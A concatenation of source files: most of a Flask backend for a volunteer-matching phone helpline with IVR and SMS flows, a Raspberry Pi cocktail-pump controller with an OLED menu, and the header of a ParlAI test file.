return json.dumps(payload)
@app.route("/api/callExistingCustomer/<string:telehelpCallId>", methods=["POST"])
def callExistingCustomer(telehelpCallId):
helperPhone = request.form.get("from")
customerPhone = readActiveCustomer(DATABASE, DATABASE_KEY, helperPhone)
payload = {
"connect": customerPhone,
"callerid": ELK_NUMBER,
"whenhangup": BASE_URL + "/api/helperHangup/%s" % telehelpCallId,
}
return json.dumps(payload)
@app.route("/api/removeHelper/<string:telehelpCallId>", methods=["POST"])
def removeHelper(telehelpCallId):
from_sender = request.form.get("from")
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeHelperAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["call_end_time", "contacted_prev_customer", "deregistered"],
(endTime, "False", "True", telehelpCallId),
)
deleteFromDatabase(DATABASE, DATABASE_KEY, from_sender, "helper")
return ""
@app.route("/api/handleReturningCustomer/<string:telehelpCallId>", methods=["POST"])
def handleReturningCustomer(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
phone = request.form.get("from")
if number == 1:
payload = {
"play": MEDIA_URL + "/ivr/du_kopplas.mp3",
"skippable": "true",
"next": BASE_URL + "/api/callExistingHelper/%s" % telehelpCallId,
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
if number == 2:
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["used_prev_helper", "deregistered"],
("False", "False", telehelpCallId),
)
zipcode = readZipcodeFromDatabase(DATABASE, DATABASE_KEY, phone, "customer")
payload = {
"play": MEDIA_URL + "/ivr/vi_letar.mp3",
"skippable": "true",
"next": BASE_URL + "/api/postcodeInput/%s/%s" % (zipcode, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
if number == 3:
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["used_prev_helper", "deregistered"],
("False", "True", telehelpCallId),
)
payload = {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeCustomer",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
return ""
@app.route("/api/handleLonelyCustomer/<string:telehelpCallId>", methods=["POST"])
def handleLonelyCustomer(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
phone = request.form.get("from")
if number == 1:
zipcode = readZipcodeFromDatabase(DATABASE, DATABASE_KEY, phone, "customer")
payload = {
"play": MEDIA_URL + "/ivr/vi_letar.mp3",
"skippable": "true",
"next": BASE_URL + "/api/postcodeInput/%s/%s" % (zipcode, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
if number == 2:
writeCustomerAnalytics(
DATABASE, DATABASE_KEY, telehelpCallId, ["deregistered"], ("True", telehelpCallId)
)
payload = {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeCustomer",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
return ""
@app.route("/api/callExistingHelper/<string:telehelpCallId>", methods=["POST"])
def callExistingHelper(telehelpCallId):
customerPhone = request.form.get("from")
helperPhone = readActiveHelper(DATABASE, DATABASE_KEY, customerPhone)
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["used_prev_helper", "deregistered"],
("True", "False", telehelpCallId),
)
payload = {
"connect": helperPhone,
"callerid": ELK_NUMBER,
"whenhangup": BASE_URL + "/api/customerHangup/%s" % telehelpCallId,
}
return json.dumps(payload)
@app.route("/api/postcodeInput/<string:zipcode>/<string:telehelpCallId>", methods=["POST"])
def postcodeInput(zipcode, telehelpCallId):
callId = request.form.get("callid")
phone = request.form.get("from")
# TODO: Add sound if zipcode is invalid (n/a)
district = getDistrict(int(zipcode), DISTRICT_DICT)
timestr = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
saveCustomerToDatabase(DATABASE, DATABASE_KEY, phone, str(zipcode), district, timestr)
print("zipcode: ", zipcode)
closestHelpers = fetchHelper(DATABASE, DATABASE_KEY, district, zipcode, LOCATION_DICT)
# Reads if the customer has a current helper and if so it will delete the current helper from closestHelpers
# since the customer have choosen a new helper.
# closestHelpers
helperPhone = readActiveHelper(DATABASE, DATABASE_KEY, phone)
print(f"Helperphone: {helperPhone}")
print(f"closestHelpers: {closestHelpers}")
if helperPhone is not None:
if closestHelpers is not None and helperPhone in closestHelpers:
closestHelpers.remove(helperPhone)
writeActiveCustomer(DATABASE, DATABASE_KEY, helperPhone, None)
writeCallHistory(DATABASE, DATABASE_KEY, callId, "closest_helpers", json.dumps(closestHelpers))
if closestHelpers is None:
writeCustomerAnalytics(
DATABASE, DATABASE_KEY, telehelpCallId, ["n_helpers_contacted"], ("0", telehelpCallId)
)
payload = {"play": MEDIA_URL + "/ivr/finns_ingen.mp3"}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
else:
writeCallHistory(DATABASE, DATABASE_KEY, callId, "hangup", "False")
payload = {
"play": MEDIA_URL + "/ivr/ringer_tillbaka.mp3",
"skippable": "true",
"next": BASE_URL + "/api/call/0/%s/%s/%s" % (callId, phone, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route(
"/api/call/<int:helperIndex>/<string:customerCallId>/<string:customerPhone>/<string:telehelpCallId>",
methods=["POST"],
)
def call(helperIndex, customerCallId, customerPhone, telehelpCallId):
# NOTE: When making changes here, also update /callSupport :)
stopCalling = readCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup")
if stopCalling == "True":
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["call_end_time", "n_helpers_contacted"],
(endTime, str(helperIndex), telehelpCallId),
)
return ""
else:
print("helperIndex:", helperIndex)
print("Customer callId: ", customerCallId)
closestHelpers = json.loads(readCallHistory(DATABASE, DATABASE_KEY, customerCallId, "closest_helpers"))
print("closest helpers: ", closestHelpers)
auth = (API_USERNAME, API_PASSWORD)
if helperIndex >= len(closestHelpers):
writeCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup", "True")
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["n_helpers_contacted"],
(str(helperIndex), telehelpCallId),
)
return redirect(
url_for("callBackToCustomer", customerPhone=customerPhone, telehelpCallId=telehelpCallId)
)
print(closestHelpers[helperIndex])
print(ELK_NUMBER)
payload = {
"ivr": MEDIA_URL + "/ivr/hjalte.mp3",
"timeout": "30",
"1": BASE_URL + "/api/connectUsers/%s/%s/%s" % (customerPhone, customerCallId, telehelpCallId),
"2": BASE_URL
+ "/api/call/%s/%s/%s/%s" % (str(helperIndex + 1), customerCallId, customerPhone, telehelpCallId),
"next": BASE_URL
+ "/api/call/%s/%s/%s/%s" % (str(helperIndex + 1), customerCallId, customerPhone, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
print("Calling: ", closestHelpers[helperIndex])
fields = {
"from": ELK_NUMBER,
"to": closestHelpers[helperIndex],
"voice_start": json.dumps(payload),
"whenhangup": BASE_URL
+ "/api/call/%s/%s/%s/%s" % (str(helperIndex + 1), customerCallId, customerPhone, telehelpCallId),
}
response = requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
print(response.text)
return ""
@app.route("/api/callBackToCustomer/<string:customerPhone>/<string:telehelpCallId>", methods=["POST", "GET"])
def callBackToCustomer(customerPhone, telehelpCallId):
print("No one found")
auth = (API_USERNAME, API_PASSWORD)
payload = {"play": MEDIA_URL + "/ivr/ingen_hittad.mp3"}
fields = {"from": ELK_NUMBER, "to": customerPhone, "voice_start": json.dumps(payload)}
requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["call_end_time", "match_found"],
(endTime, "False", telehelpCallId),
)
return ""
@app.route("/api/removeCustomer", methods=["POST"])
def removeCustomer():
from_sender = request.form.get("from")
deleteFromDatabase(DATABASE, DATABASE_KEY, from_sender, "customer")
return ""
@app.route("/api/handleNumberInput/<string:telehelpCallId>", methods=["POST"])
def handleNumberInput(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
print("number: ", number)
print("Write your zipcode")
payload = {
"play": MEDIA_URL + "/ivr/post_nr.mp3",
"next": {
"ivr": MEDIA_URL + "/ivr/bep.mp3",
"digits": 5,
"next": BASE_URL + "/api/checkZipcode/%s" % telehelpCallId,
},
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
return ""
@app.route("/api/checkZipcode/<string:telehelpCallId>", methods=["POST"])
def checkZipcode(telehelpCallId):
zipcode = request.form.get("result")
callId = request.form.get("callid")
city = getCity(int(zipcode), CITY_DICT)
cityEncoded = urllib.parse.quote(city)
print("zipcode: ", zipcode)
print("callId: ", callId)
print("city: ", city)
print("cityEnc: ", cityEncoded)
payload = {
"play": MEDIA_URL + "/ivr/du_befinner.mp3",
"next": {
"play": MEDIA_URL + "/city/" + cityEncoded + ".mp3",
"next": {
"ivr": MEDIA_URL + "/ivr/stammer_det.mp3",
"1": BASE_URL + f"/api/postcodeInput/{zipcode}/{telehelpCallId}",
"2": BASE_URL + "/api/handleNumberInput/%s" % telehelpCallId,
"next": BASE_URL + "/api/handleNumberInput/%s" % telehelpCallId,
},
},
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route(
"/api/connectUsers/<string:customerPhone>/<string:customerCallId>/<string:telehelpCallId>",
methods=["POST"],
)
def connectUsers(customerPhone, customerCallId, telehelpCallId):
helperPhone = request.form.get("to")
print("helper: ", helperPhone)
print("Saving customer -> helper connection to database")
# TODO: check current active customer/helper and move to previous
writeCustomerAnalytics(DATABASE, DATABASE_KEY, telehelpCallId, ["match_found"], ("True", telehelpCallId))
# writeCustomerAnalytics(DATABASE, DATABASE_KEY, telehelpCallId, match_found="True")
writeActiveCustomer(DATABASE, DATABASE_KEY, helperPhone, customerPhone)
writeActiveHelper(DATABASE, DATABASE_KEY, customerPhone, helperPhone)
writeCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup", "True")
print("Connecting users")
print("customer:", customerPhone)
if HOOK_URL is not None:
res = readNewConnectionInfo(DATABASE, DATABASE_KEY, helperPhone)[0]
requests.post(
HOOK_URL, {"content": f"{res[0]} från {res[1]} har fått kontakt med någon som behöver hjälp!"}
)
payload = {"connect": customerPhone, "callerid": ELK_NUMBER, "timeout": "15"}
# Send a delayed SMS asking for a response on whether assignment accepted
print("Preparing to send SMS to connected volunteer.")
smsThread = threading.Thread(target=sendAskIfHelpingSms, args=(helperPhone,))
smsThread.start()
return json.dumps(payload)
def sendAskIfHelpingSms(volunteerNumber):
time.sleep(60)
msg = "Förhoppningsvis kan du hjälpa personen du precis pratade med. \
Ring till Telehelp på 0766861551 för att nå personen igen vid behov. \
Svara TILLGÄNGLIG om du inte kunde hjälpa till eller är klar med uppgiften, så gör \
vi dig tillgänglig för nya uppdrag. Observera att varken du eller den \
du hjälpt kommer kunna nå varandra igen om du gör detta. Tack för din insats!"
auth = (API_USERNAME, API_PASSWORD)
fields = {"from": ELK_NUMBER, "to": volunteerNumber, "message": msg}
requests.post(ELK_BASE + "/a1/sms", auth=auth, data=fields)
print("Sent confirmation SMS to volunteer: " + volunteerNumber)
@app.route("/api/receiveSms", methods=["POST"])
def receiveSms():
volunteerNumber = request.form.get("from")
response = request.form.get("message").strip().upper()
print("SMS received: " + response + " from " + volunteerNumber)
if response == "TILLGÄNGLIG":
# Clear database pairing to make volunteer available again. Remove volunteer from customer side too.
clearCustomerHelperPairing(DATABASE, DATABASE_KEY, volunteerNumber)
# Your webhook code must respond with a HTTP status in the range 200-204.
return ""
# -------------------------------------------------------------------------------------------------
@app.route("/register", methods=["POST"])
def register():
data = request.json
if REGISTRATION_SCHEMA.is_valid(data):
validated = REGISTRATION_SCHEMA.validate(data)
city = getDistrict(validated["zipCode"], DISTRICT_DICT)
phone_number = canonicalize_number(validated["phoneNumber"])
if city == "n/a":
return {"type": "failure", "message": "Invalid zip"}
if userExists(DATABASE, DATABASE_KEY, phone_number, "helper"):
return {"type": "failure", "message": "User already exists"}
code = "".join(secrets.choice(string.digits) for _ in range(6))
auth = (API_USERNAME, API_PASSWORD)
fields = {"from": "Telehelp", "to": phone_number, "message": code}
requests.post(ELK_BASE + "/a1/sms", auth=auth, data=fields)
session[phone_number] = {
"zipCode": validated["zipCode"],
"name": validated["helperName"],
"city": city,
"timestamp": int(time.time()),
"code": code,
}
return {"type": "success"}
return {"type": "failure"}
@app.route("/verify", methods=["POST"])
def verify():
data = request.json
if VERIFICATION_SCHEMA.is_valid(data):
validated = VERIFICATION_SCHEMA.validate(data)
phone_number = canonicalize_number(validated["number"])
code = validated["verificationCode"]
if (
phone_number in session
and int(time.time()) - session[phone_number]["timestamp"] < VERIFICATION_EXPIRY_TIME
and code == session[phone_number]["code"]
):
sess = session[phone_number]
name = sess["name"]
zipcode = sess["zipCode"]
city = sess["city"]
if HOOK_URL is not None:
requests.post(HOOK_URL, {"content": f"{name} från {city} har registrerat sig som volontär!"})
log.info(f"Saving helper to database {name}, {phone_number}, {zipcode}, {city}")
timestr = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
saveHelperToDatabase(DATABASE, DATABASE_KEY, name, phone_number, zipcode, city, timestr)
# TODO: Remove soundbyte if user quits?
urlEscapedName = urllib.parse.quote(name)
mediaPath = os.path.join("/", "media", f"{urlEscapedName}.mp3")
if not os.path.isfile(mediaPath) and os.getenv("GOOGLE_APPLICATION_CREDENTIALS") is not None:
generateNameSoundByte(name)
return {"type": "success"}
return {"type": "failure"}
@app.route("/getVolunteerLocations", methods=["GET"])
def getVolunteerLocations():
query = "SELECT zipcode FROM user_helpers"
volunteer_zipcodes_df = fetchData(DATABASE, DATABASE_KEY, query, params=None)["zipcode"]
district_data = defaultdict(list)
c = Counter(volunteer_zipcodes_df)
for zipCode, count in c.most_common():
z = int(zipCode) # Should change this to use string if we have the time
district = DISTRICT_DICT.get(z)
entry = {
"coordinates": LOCATION_DICT.get(z),
"city": CITY_DICT.get(z),
"zipcode": zipCode,
"count": count,
}
district_data[district].append(entry)
return {
"total": sum(c.values()),
"locations": [{"district": key, "data": val} for key, val in district_data.items()],
}
#################### TELEHELP SUPPORT FUNCTIONS ###########################
@app.route("/api/support", methods=["POST"])
def support():
# Call the Telehelp team in randomized order
callId = request.form.get("callid")
phone = request.form.get("from")
# J, T, DEr
supportTeam = ["+46737600282", "+46707812741"]
random.shuffle(supportTeam) # Randomize order to spread load
writeCallHistory(DATABASE, DATABASE_KEY, callId, "closest_helpers", json.dumps(supportTeam))
writeCallHistory(DATABASE, DATABASE_KEY, callId, "hangup", "False")
payload = {
"play": MEDIA_URL + "/ivr/ringer_tillbaka_support.mp3",
"skippable": "true",
"next": BASE_URL + "/api/callSupport/0/%s/%s" % (callId, phone),
}
return json.dumps(payload)
@app.route("/api/callSupport/<int:helperIndex>/<string:supportCallId>/<string:supportPhone>", methods=["POST"])
def callSupport(helperIndex, supportCallId, supportPhone):
stopCalling = readCallHistory(DATABASE, DATABASE_KEY, supportCallId, "hangup")
if stopCalling == "True":
return ""
else:
print("supportTeamIndex:", helperIndex)
print("Support customer callId: ", supportCallId)
supportTeamList = json.loads(readCallHistory(DATABASE, DATABASE_KEY, supportCallId, "closest_helpers"))
print("closest helpers: ", supportTeamList)
auth = (API_USERNAME, API_PASSWORD)
if helperIndex >= len(supportTeamList):
writeCallHistory(DATABASE, DATABASE_KEY, supportCallId, "hangup", "True")
return redirect(url_for("callBackToSupportCustomer", supportPhone=supportPhone))
print(supportTeamList[helperIndex])
print(ELK_NUMBER)
# TODO: Handle if call is not picked up
payload = {
"ivr": MEDIA_URL + "/ivr/hjalte_support.mp3",
"timeout": "30",
"1": BASE_URL + "/api/connectUsersSupport/%s/%s" % (supportPhone, supportCallId),
"2": BASE_URL + "/api/callSupport/%s/%s/%s" % (str(helperIndex + 1), supportCallId, supportPhone),
"next": BASE_URL
+ "/api/callSupport/%s/%s/%s" % (str(helperIndex + 1), supportCallId, supportPhone),
}
print("Calling: ", supportTeamList[helperIndex])
fields = {
"from": ELK_NUMBER,
"to": supportTeamList[helperIndex],
"voice_start": json.dumps(payload),
"whenhangup": BASE_URL
+ "/api/callSupport/%s/%s/%s" % (str(helperIndex + 1), supportCallId, supportPhone),
}
response = requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
print(response.text)
return ""
@app.route("/api/callBackToSupportCustomer/<string:supportPhone>", methods=["POST", "GET"])
def callBackToSupportCustomer(supportPhone):
print("No support team person found")
auth = (API_USERNAME, API_PASSWORD)
payload = {"play": MEDIA_URL + "/ivr/ingen_hittad_support.mp3"}
fields = {"from": ELK_NUMBER, "to": supportPhone, "voice_start": json.dumps(payload)}
requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
return ""
@app.route("/api/connectUsersSupport/<string:customerPhone>/<string:customerCallId>", methods=["POST"])
def connectUsersSupport(customerPhone, customerCallId):
helperPhone = request.form.get("to")
print("support from: ", helperPhone)
writeCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup", "True")
print("Connecting users")
print("customer:", customerPhone)
payload = {"connect": customerPhone, "callerid": ELK_NUMBER, "timeout": "15"}
return json.dumps(payload)
# -----------------------------------Test Functions-------------------------------------------------
@app.route("/testredirect/<int:numb>", methods=["POST", "GET"])
def testredirect(numb):
print(f"Redirect works:{numb}")
return "Redirect works"
@app.route("/testendpoint", methods=["GET"])
def testendpoint():
return redirect(url_for("testredirect", numb=1))
# --------------------------------------------------------------------------------------------------
|
bartender.py
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
#--------------Driver Library-----------------#
import OLED_Driver as OLED
import time
import sys
import RPi.GPIO as GPIO
import json
import traceback
import threading
import textwrap
import subprocess
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from PIL import ImageColor
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 128
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 200
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 200
STATE_UNKNOWN = "Unknown"
STATE_INITIALIZING = "Initializing"
STATE_RUNNING = "Running"
STATE_WAITING = "Waiting..."
STATE_SLEEPING = "Sleeping"
STATE_POURING = "Pouring..."
STATE_POUR_FINISHED = "Enjoy your drink!"
STATE_CLEANING = "Cleaning..."
STATE_SHUTDOWN = "Please wait 10 seconds to power off"
SLEEP_TIMEOUT = 30
machine_state = STATE_INITIALIZING
prev_machine_state = STATE_UNKNOWN
display_machine_state = STATE_UNKNOWN
start_time = time.time()
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/500.0
# Raspberry Pi pin configuration:
RST = 14
# Note the following are only used with SPI:
DC = 15
SPI_PORT = 0
SPI_DEVICE = 0
#Fontsize and Font Type Settings
FONTSIZE = 15
FONTFILE = "cambriab.ttf"
#Wraps Text for better view on OLED screen. 13 is best for 128x64
WRAPPER = textwrap.TextWrapper(width=13)
class Bartender(MenuDelegate):
def __init__(self):
self.machine_state = STATE_INITIALIZING
self.display_machine_state = self.machine_state
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
GPIO.setmode(GPIO.BCM)
# configure interrups for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(LEFT_BTN_PIN, GPIO.FALLING, callback=self.left_btn, bouncetime=100)
GPIO.add_event_detect(RIGHT_BTN_PIN, GPIO.FALLING, callback=self.right_btn, bouncetime=100)
# configure screen
spi_bus = 0
spi_device = 0
#Load the display driver.
OLED.Device_Init()
self.image = Image.new("RGB", (self.screen_width, self.screen_height), "BLACK")
self.draw = ImageDraw.Draw(self.image)
self.font = ImageFont.truetype(FONTFILE ,FONTSIZE)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
print ("Done initializing")
self.machine_state = STATE_WAITING
self.display_machine_state = STATE_WAITING
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
# adds an option that shuts down the rpi
configuration_menu.addOption(MenuItem('shutdown', 'Shutdown'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
elif(menuItem.type == "shutdown"):
self.shutdown()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.machine_state = STATE_CLEANING
self.display_machine_state = self.machine_state
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar - something isn't right with the progress bar. it lasts sigificantly longer than the pumping
# self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
self.machine_state = STATE_WAITING
def shutdown(self):
self.display_machine_state = STATE_SHUTDOWN
self.displayMenuItem(menuItem)
time.sleep(5)
OLED.Clear_Screen()
#Clean shutdown device
subprocess.Popen(['shutdown','-h','now'])
def displayMenuItem(self, menuItem):
print (menuItem.name)
self.draw.rectangle([0,0,self.screen_width,self.screen_height], fill="BLACK",)
self.draw.text((0,12), menuItem.name, fill = "BLUE", font = self.font)
self.draw.text((0,30), self.display_machine_state, fill = "ORANGE", font = self.font)
OLED.Clear_Screen()
OLED.Display_Image(self.image)
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while getattr(t, "do_run", True):
self.strip.setPixelColor(head, color) # Turn on 'head' pixel
self.strip.setPixelColor(tail, 0) # Turn off 'tail'
self.strip.show() # Refresh strip
time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
head += 1 # Advance head position
if(head >= self.numpixels): # Off end of strip?
head = 0 # Reset to start
color >>= 8 # Red->green->blue->black
if(color == 0): color = 0xFF0000 # If black, reset to red
tail += 1 # Advance tail position
if(tail >= self.numpixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0xFF0000)
self.strip.show()
time.sleep(5)
# turn lights off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100
for x in range(1, 101):
self.updateProgressBar(x, y=35)
OLED.Display_Image(self.image)
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.prev_machine_state = self.machine_state
self.machine_state = STATE_POURING
self.display_machine_state = self.machine_state
# launch a thread to control lighting
# lightsThread = threading.Thread(target=self.cycleLights)
# lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
# print("maxtime: " + str(maxTime))
# self.progressBar(maxTime)
self.menuContext.showMenu()
# wait for threads to finish
for thread in pumpThreads:
thread.join()
self.machine_state = STATE_POUR_FINISHED
self.display_machine_state = self.machine_state
self.menuContext.showMenu()
time.sleep(2)
self.machine_state = STATE_WAITING
self.display_machine_state = self.machine_state
# show the main menu
#self.menuContext.showMenu()
# stop the light thread
# lightsThread.do_run = False
# lightsThread.join()
# show the ending sequence lights
# self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
#time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.start_time = time.time()
def left_btn(self, ctx):
if self.machine_state != STATE_RUNNING:
self.prev_machine_state = self.machine_state
self.machine_state = STATE_RUNNING
self.display_machine_state = self.prev_machine_state
self.start_time = time.time()
if (self.prev_machine_state == STATE_SLEEPING):
self.display_machine_state == STATE_WAITING
self.menuContext.showMenu()
print("LEFT button press woke from sleep")
elif (self.prev_machine_state == STATE_WAITING):
self.menuContext.advance()
print("LEFT button press advanced menu")
else:
print("ignored LEFT button press")
self.machine_state = STATE_WAITING
self.prev_machine_state = STATE_WAITING
def right_btn(self, ctx):
if self.machine_state != STATE_RUNNING:
self.prev_machine_state = self.machine_state
self.machine_state = STATE_RUNNING
self.display_machine_state = self.prev_machine_state
self.start_time = time.time()
if (self.prev_machine_state == STATE_SLEEPING):
self.display_machine_state = STATE_WAITING
self.menuContext.showMenu()
print("RIGHT button press woke from sleep")
elif (self.prev_machine_state == STATE_WAITING):
self.menuContext.select()
print("RIGHT button press selected menu item")
else:
print("ignored RIGHT button press")
self.machine_state = STATE_WAITING
self.prev_machine_state = STATE_WAITING
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.draw.point((w + x, y), fill=255)
self.draw.point((w + x, y + height), fill=255)
for h in range(0, height):
self.draw.point((x, h + y), fill=255)
self.draw.point((self.screen_width-x, h + y), fill=255)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.draw.point((x + p_loc, h + y), fill=255)
def run(self):
self.start_time = time.time()
# main loop
try:
while True:
# disable OLED screen if no activity for SLEEP_TIMEOUT seconds to prevent burning out screen
if ((time.time() - self.start_time) > SLEEP_TIMEOUT) and (self.machine_state != STATE_SLEEPING):
self.machine_state = STATE_SLEEPING
self.display_machine_state = self.machine_state
OLED.Clear_Screen()
except KeyboardInterrupt:
OLED.Clear_Screen()
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
test_full_system.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import time
import uuid
import os
from unittest import mock
from parlai.mturk.core.dev.socket_manager import Packet, SocketManager
